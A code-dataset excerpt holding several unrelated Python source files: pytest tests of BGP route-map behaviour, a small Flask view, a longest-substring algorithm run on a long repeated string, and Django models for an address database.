result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
rmap_name = "rmap_match_pf_1"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
seq_id = {"ipv4": ["10", "30"], "ipv6": ["10", "30"]}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen,
addr_type,
dut,
routes[addr_type],
rmap_name,
input_dict_3,
seq_id[addr_type],
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_route_maps_with_call_clause_p0():
"""
TC_53:
Verify route-maps call clause functionality.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150},
"call": "rmap_match_pf_2_{}".format(addr_type),
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 200},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
rmap_name = "rmap_match_pf_1"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
rmap_name = "rmap_match_pf_2"
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_create_rmap_match_prefix_list_to_deny_in_and_outbound_prefixes_p0():
"""
TC_58:
Create route map deny inbound and outbound prefixes on
match prefix list and set criteria on match
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "deny",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "deny",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are not present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_create_rmap_to_match_tag_permit_inbound_prefixes_p0():
"""
TC_59:
Create route map to permit inbound prefixes with filter
match tag and set criteria
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
for addr_type in ADDR_TYPES:
# Create Static routes
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = create_static_routes(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Api call to redistribute static routes
input_dict_1 = {
"r1": {
"bgp": {
"local_as": 100,
"address_family": {
"ipv4": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
"ipv6": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
},
}
}
}
result = create_router_bgp(tgen, topo, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
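        # Reference sketch (assumption): the redistribution dict should
        # render roughly as
        #   router bgp 100
        #    address-family ipv4 unicast
        #     redistribute static
        #     redistribute connected
        # and likewise under "address-family ipv6 unicast".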
# Create route map
input_dict_3 = {
"r1": {
"route_maps": {
"rmap_match_tag_1_{}".format(addr_type): [
{"action": "permit", "match": {addr_type: {"tag": "4001"}}}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv4",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv6",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_create_rmap_to_match_tag_deny_outbound_prefixes_p0():
"""
TC_60:
Create route map to deny outbound prefixes with filter match tag,
and set criteria
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
for addr_type in ADDR_TYPES:
# Create Static routes
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = create_static_routes(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Api call to redistribute static routes
input_dict_1 = {
"r1": {
"bgp": {
"local_as": 100,
"address_family": {
"ipv4": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
"ipv6": {
"unicast": {
"redistribute": [
{"redist_type": "static"},
{"redist_type": "connected"},
]
}
},
},
}
}
}
result = create_router_bgp(tgen, topo, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Create route map
input_dict_3 = {
"r1": {
"route_maps": {
"rmap_match_tag_1_{}".format(addr_type): [
{"action": "deny", "match": {addr_type: {"tag": "4001"}}}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv4",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rmap_match_tag_1_ipv6",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
input_dict = {
"r1": {
"static_routes": [
{"network": NETWORK[addr_type], "next_hop": "Null0", "tag": 4001}
]
}
}
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nroutes are denied \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
if __name__ == "__main__":
args = ["-s"] + sys.argv[1:]
sys.exit(pytest.main(args))
[record stats for the preceding file: avg_line_length 34.82 | max_line_length 99 | alphanum_fraction 0.354 | 10,641 words | 138,651 chars | 3,981 lines; remaining per-file quality-signal columns elided]
eccd1cecd32d6fb9dab7d4ab7222eec507ab6f01 | 87 | py | Python | adoteaqui/adoteaqui/views.py | eduardooarruda/AdoteAqui2 | 8b329f9a4b4a6d29158f490ccc59791de7c717a4 | ["MIT"] | stars/issues/forks: null
from flask import render_template
def root():
    return render_template('index.html')
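# Usage sketch (assumption; nothing below exists in this file): root() would
# typically be wired to a Flask app, e.g.
#
#   from flask import Flask
#   from adoteaqui.views import root
#
#   app = Flask(__name__)
#   app.add_url_rule('/', 'root', root)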
[record stats: avg_line_length 21.75 | max_line_length 40 | alphanum_fraction 0.770 | 12 words | 87 chars | 4 lines; remaining quality-signal columns elided]
01cb54a2b9286746173afa7230429ab774854e24 | 32,388 | py | Python | src/3_LongestSubstring_Mac.py | chenbin11200/AlgorithmInPython | 222780f14afdafc4c7d0047b6f1477bd0b0ecf0f | ["MIT"] | stars/issues/forks: null
class Solution(object):
    def lengthOfLongestSubstring(self, s):
        """
        :type s: str
        :rtype: int
        """
        longestSubstringLength = 0
        substring = {}  # maps each character in the current window to its index
        index = 0       # left edge of the current window
        # Stop early once the remaining suffix cannot beat the best length.
        while (index + longestSubstringLength) < len(s):
            for head in range(index, len(s)):
                if s[head] in substring:
                    # Duplicate found: restart the window just past the
                    # previous occurrence and rebuild the lookup table.
                    index = substring[s[head]] + 1
                    substring = {}
                    break
                else:
                    substring[s[head]] = head
                    if (head - index + 1) > longestSubstringLength:
                        longestSubstringLength = head - index + 1
        return longestSubstringLength
# The original call passed one enormous inline literal that simply repeats
# every printable ASCII character. Building the input from a single unit is
# equivalent: the longest duplicate-free run can never exceed one unit, so
# the exact repeat count (lost to truncation in the source) does not affect
# the result.
unit = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ ")
a = Solution().lengthOfLongestSubstring(unit * 300)
print(a)
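# Alternative sketch (not part of the original file): the canonical O(n)
# sliding-window version of the same algorithm, for comparison with the
# restart-based loop above.
def length_of_longest_substring(s):
    last_seen = {}  # char -> index of its most recent occurrence
    start = 0       # left edge of the current duplicate-free window
    best = 0
    for i, ch in enumerate(s):
        # If ch already occurs inside the window, slide the left edge just
        # past its previous occurrence instead of rescanning from scratch.
        if ch in last_seen and last_seen[ch] >= start:
            start = last_seen[ch] + 1
        last_seen[ch] = i
        best = max(best, i - start + 1)
    return best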
[record stats: avg_line_length 1,408.17 | max_line_length 31,695 | alphanum_fraction 0.647 | 389 words | 32,388 chars | 23 lines; remaining quality-signal columns elided]
01fe18eaff0b9e5ef1aa07b8cf477ae81e7b8e91 | 23,771 | py | Python | api/places/models.py | william-librata/places-api | 4d422fef3de501318ad1d8e55ba576171eea626e | ["MIT"] | stars/issues/forks: null
from django.db import models
class AddressAlias(models.Model):
address_alias_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
principal_pid = models.ForeignKey('AddressDetail', models.DO_NOTHING, db_column='principal_pid', related_name='address_alias_principal_pid', null=True)
alias_pid = models.ForeignKey('AddressDetail', models.DO_NOTHING, db_column='alias_pid', related_name='address_alias_pid', null=True)
alias_type_code = models.ForeignKey('AddressAliasTypeAut', models.DO_NOTHING, db_column='alias_type_code', null=True)
alias_comment = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_alias'
class AddressAliasTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=10)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_alias_type_aut'
class AddressDefaultGeocode(models.Model):
address_default_geocode_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_detail_pid = models.ForeignKey('AddressDetail', models.DO_NOTHING, db_column='address_detail_pid', null=True)
geocode_type_code = models.ForeignKey('GeocodeTypeAut', models.DO_NOTHING, db_column='geocode_type_code', null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_default_geocode'
class AddressDetail(models.Model):
address_detail_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_last_modified = models.DateField(blank=True, null=True)
date_retired = models.DateField(blank=True, null=True)
building_name = models.CharField(max_length=200, blank=True, null=True)
lot_number_prefix = models.CharField(max_length=2, blank=True, null=True)
lot_number = models.CharField(max_length=5, blank=True, null=True)
lot_number_suffix = models.CharField(max_length=2, blank=True, null=True)
flat_type_code = models.ForeignKey('FlatTypeAut', models.DO_NOTHING, db_column='flat_type_code', blank=True, null=True)
flat_number_prefix = models.CharField(max_length=2, blank=True, null=True)
flat_number = models.DecimalField(max_digits=5, decimal_places=0, blank=True, null=True)
flat_number_suffix = models.CharField(max_length=2, blank=True, null=True)
level_type_code = models.ForeignKey('LevelTypeAut', models.DO_NOTHING, db_column='level_type_code', blank=True, null=True)
level_number_prefix = models.CharField(max_length=2, blank=True, null=True)
level_number = models.DecimalField(max_digits=3, decimal_places=0, blank=True, null=True)
level_number_suffix = models.CharField(max_length=2, blank=True, null=True)
number_first_prefix = models.CharField(max_length=3, blank=True, null=True)
number_first = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_first_suffix = models.CharField(max_length=2, blank=True, null=True)
number_last_prefix = models.CharField(max_length=3, blank=True, null=True)
number_last = models.DecimalField(max_digits=6, decimal_places=0, blank=True, null=True)
number_last_suffix = models.CharField(max_length=2, blank=True, null=True)
street_locality_pid = models.ForeignKey('StreetLocality', models.DO_NOTHING, db_column='street_locality_pid', blank=True, null=True)
location_description = models.CharField(max_length=45, blank=True, null=True)
locality_pid = models.ForeignKey('Locality', models.DO_NOTHING, db_column='locality_pid', null=True)
alias_principal = models.CharField(max_length=1, blank=True, null=True)
postcode = models.CharField(max_length=4, blank=True, null=True)
private_street = models.CharField(max_length=75, blank=True, null=True)
legal_parcel_id = models.CharField(max_length=20, blank=True, null=True)
confidence = models.DecimalField(max_digits=1, decimal_places=0, blank=True, null=True)
address_site_pid = models.ForeignKey('AddressSite', models.DO_NOTHING, db_column='address_site_pid', null=True)
level_geocoded_code = models.ForeignKey('GeocodedLevelTypeAut', models.DO_NOTHING, db_column='level_geocoded_code', null=True)
property_pid = models.CharField(max_length=15, blank=True, null=True)
gnaf_property_pid = models.CharField(max_length=15, blank=True, null=True)
primary_secondary = models.CharField(max_length=1, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_detail'
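# Usage sketch (assumption; illustrative only, not generated by inspectdb):
# fetching an address together with its related rows in a single query. The
# pid value is hypothetical.
#
#   detail = (AddressDetail.objects
#             .select_related('locality_pid', 'address_site_pid')
#             .get(address_detail_pid='GANSW1234567890'))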
class AddressMeshBlock2011(models.Model):
address_mesh_block_2011_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_detail_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='address_detail_pid', null=True)
mb_match_code = models.ForeignKey('MbMatchCodeAut', models.DO_NOTHING, db_column='mb_match_code', null=True)
mb_2011_pid = models.ForeignKey('Mb2011', models.DO_NOTHING, db_column='mb_2011_pid', null=True)
class Meta:
managed = True
db_table = 'address_mesh_block_2011'
class AddressMeshBlock2016(models.Model):
address_mesh_block_2016_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_detail_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='address_detail_pid', null=True)
mb_match_code = models.ForeignKey('MbMatchCodeAut', models.DO_NOTHING, db_column='mb_match_code', null=True)
mb_2016_pid = models.ForeignKey('Mb2016', models.DO_NOTHING, db_column='mb_2016_pid', null=True)
class Meta:
managed = True
db_table = 'address_mesh_block_2016'
class AddressSite(models.Model):
address_site_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_type = models.ForeignKey('AddressTypeAut', models.DO_NOTHING, db_column='address_type', blank=True, null=True)
address_site_name = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_site'
class AddressSiteGeocode(models.Model):
address_site_geocode_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
address_site_pid = models.ForeignKey(AddressSite, models.DO_NOTHING, db_column='address_site_pid', blank=True, null=True)
geocode_site_name = models.CharField(max_length=200, blank=True, null=True)
geocode_site_description = models.CharField(max_length=45, blank=True, null=True)
geocode_type_code = models.ForeignKey('GeocodeTypeAut', models.DO_NOTHING, db_column='geocode_type_code', blank=True, null=True)
reliability_code = models.ForeignKey('GeocodeReliabilityAut', models.DO_NOTHING, db_column='reliability_code', null=True)
boundary_extent = models.DecimalField(max_digits=7, decimal_places=0, blank=True, null=True)
planimetric_accuracy = models.DecimalField(max_digits=12, decimal_places=0, blank=True, null=True)
elevation = models.DecimalField(max_digits=7, decimal_places=0, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_site_geocode'
class AddressTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=8)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'address_type_aut'
class DjangoMigrations(models.Model):
app = models.CharField(max_length=255)
name = models.CharField(max_length=255)
applied = models.DateTimeField()
class Meta:
managed = True
db_table = 'django_migrations'
class FlatTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=7)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'flat_type_aut'
class GeocodeReliabilityAut(models.Model):
code = models.DecimalField(primary_key=True, max_digits=1, decimal_places=0)
name = models.CharField(max_length=50)
description = models.CharField(max_length=100, blank=True, null=True)
class Meta:
managed = True
db_table = 'geocode_reliability_aut'
class GeocodeTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=4)
name = models.CharField(max_length=50)
description = models.CharField(max_length=250, blank=True, null=True)
class Meta:
managed = True
db_table = 'geocode_type_aut'
class GeocodedLevelTypeAut(models.Model):
code = models.DecimalField(primary_key=True, max_digits=2, decimal_places=0)
name = models.CharField(max_length=50)
description = models.CharField(max_length=70, blank=True, null=True)
class Meta:
managed = True
db_table = 'geocoded_level_type_aut'
class LevelTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=4)
name = models.CharField(max_length=50)
description = models.CharField(max_length=30, blank=True, null=True)
class Meta:
managed = True
db_table = 'level_type_aut'
class Locality(models.Model):
locality_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_name = models.CharField(max_length=100)
primary_postcode = models.CharField(max_length=4, blank=True, null=True)
locality_class_code = models.ForeignKey('LocalityClassAut', models.DO_NOTHING, db_column='locality_class_code', null=True, related_name='localityclassaut')
state_pid = models.ForeignKey('State', models.DO_NOTHING, db_column='state_pid', to_field='state_pid', null=True, related_name='state')
gnaf_locality_pid = models.CharField(max_length=15, blank=True, null=True)
gnaf_reliability_code = models.ForeignKey(GeocodeReliabilityAut, models.DO_NOTHING, db_column='gnaf_reliability_code', null=True, related_name='geocodereliabilityaut')
class Meta:
managed = True
db_table = 'locality'
class LocalityAlias(models.Model):
locality_alias_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', null=True)
name = models.CharField(max_length=100)
postcode = models.CharField(max_length=4, blank=True, null=True)
alias_type_code = models.ForeignKey('LocalityAliasTypeAut', models.DO_NOTHING, db_column='alias_type_code', null=True)
state_pid = models.CharField(max_length=15)
class Meta:
managed = True
db_table = 'locality_alias'
class LocalityAliasTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=10)
name = models.CharField(max_length=50)
description = models.CharField(max_length=100, blank=True, null=True)
class Meta:
managed = True
db_table = 'locality_alias_type_aut'
class LocalityClassAut(models.Model):
code = models.CharField(primary_key=True, max_length=1)
name = models.CharField(max_length=50)
description = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'locality_class_aut'
class LocalityNeighbour(models.Model):
locality_neighbour_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', related_name='locality_neighbour_locality_pid', null=True)
neighbour_locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='neighbour_locality_pid', related_name='locality_neighbour_neighbour_locality_pid', null=True)
class Meta:
managed = True
db_table = 'locality_neighbour'
class LocalityPoint(models.Model):
locality_point_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', null=True)
planimetric_accuracy = models.DecimalField(max_digits=12, decimal_places=0, blank=True, null=True)
longitude = models.DecimalField(max_digits=11, decimal_places=8, blank=True, null=True)
latitude = models.DecimalField(max_digits=10, decimal_places=8, blank=True, null=True)
class Meta:
managed = True
db_table = 'locality_point'
class Mb2011(models.Model):
mb_2011_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
mb_2011_code = models.CharField(max_length=15)
class Meta:
managed = True
db_table = 'mb_2011'
class Mb2016(models.Model):
mb_2016_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
mb_2016_code = models.CharField(max_length=15)
class Meta:
managed = True
db_table = 'mb_2016'
class MbMatchCodeAut(models.Model):
code = models.CharField(primary_key=True, max_length=15)
name = models.CharField(max_length=100)
description = models.CharField(max_length=250, blank=True, null=True)
class Meta:
managed = True
db_table = 'mb_match_code_aut'
class PrimarySecondary(models.Model):
primary_secondary_pid = models.CharField(primary_key=True, max_length=15)
primary_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='primary_pid', related_name='primary_secondary_primary_pid', null=True)
secondary_pid = models.ForeignKey(AddressDetail, models.DO_NOTHING, db_column='secondary_pid', related_name='primary_secondary_secondary_pid', null=True)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
ps_join_type_code = models.ForeignKey('PsJoinTypeAut', models.DO_NOTHING, db_column='ps_join_type_code', null=True)
ps_join_comment = models.CharField(max_length=500, blank=True, null=True)
class Meta:
managed = True
db_table = 'primary_secondary'
class PsJoinTypeAut(models.Model):
code = models.DecimalField(primary_key=True, max_digits=2, decimal_places=0)
name = models.CharField(max_length=50)
description = models.CharField(max_length=500, blank=True, null=True)
class Meta:
managed = True
db_table = 'ps_join_type_aut'
class State(models.Model):
state_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
state_name = models.CharField(max_length=50)
state_abbreviation = models.CharField(max_length=3)
class Meta:
managed = True
db_table = 'state'
class StreetClassAut(models.Model):
code = models.CharField(primary_key=True, max_length=1)
name = models.CharField(max_length=50)
description = models.CharField(max_length=200, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_class_aut'
class StreetLocality(models.Model):
street_locality_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
street_class_code = models.ForeignKey(StreetClassAut, models.DO_NOTHING, db_column='street_class_code', null=True)
street_name = models.CharField(max_length=100)
street_type_code = models.ForeignKey('StreetTypeAut', models.DO_NOTHING, db_column='street_type_code', blank=True, null=True)
street_suffix_code = models.ForeignKey('StreetSuffixAut', models.DO_NOTHING, db_column='street_suffix_code', blank=True, null=True)
locality_pid = models.ForeignKey(Locality, models.DO_NOTHING, db_column='locality_pid', null=True)
gnaf_street_pid = models.CharField(max_length=15, blank=True, null=True)
gnaf_street_confidence = models.DecimalField(max_digits=1, decimal_places=0, blank=True, null=True)
gnaf_reliability_code = models.ForeignKey(GeocodeReliabilityAut, models.DO_NOTHING, db_column='gnaf_reliability_code', null=True)
class Meta:
managed = True
db_table = 'street_locality'
class StreetLocalityAlias(models.Model):
street_locality_alias_pid = models.CharField(primary_key=True, max_length=15)
date_created = models.DateField()
date_retired = models.DateField(blank=True, null=True)
street_locality_pid = models.ForeignKey(StreetLocality, models.DO_NOTHING, db_column='street_locality_pid', null=True)
street_name = models.CharField(max_length=100)
street_type_code = models.ForeignKey('StreetTypeAut', models.DO_NOTHING, db_column='street_type_code', blank=True, null=True)
street_suffix_code = models.ForeignKey('StreetSuffixAut', models.DO_NOTHING, db_column='street_suffix_code', blank=True, null=True)
alias_type_code = models.ForeignKey('StreetLocalityAliasTypeAut', models.DO_NOTHING, db_column='alias_type_code', null=True)
class Meta:
managed = True
db_table = 'street_locality_alias'
class StreetLocalityAliasTypeAut(models.Model):
code = models.CharField(primary_key=True, max_length=10)
name = models.CharField(max_length=50)
description = models.CharField(max_length=15, blank=True, null=True)
class Meta:
managed = True
db_table = 'street_locality_alias_type_aut'
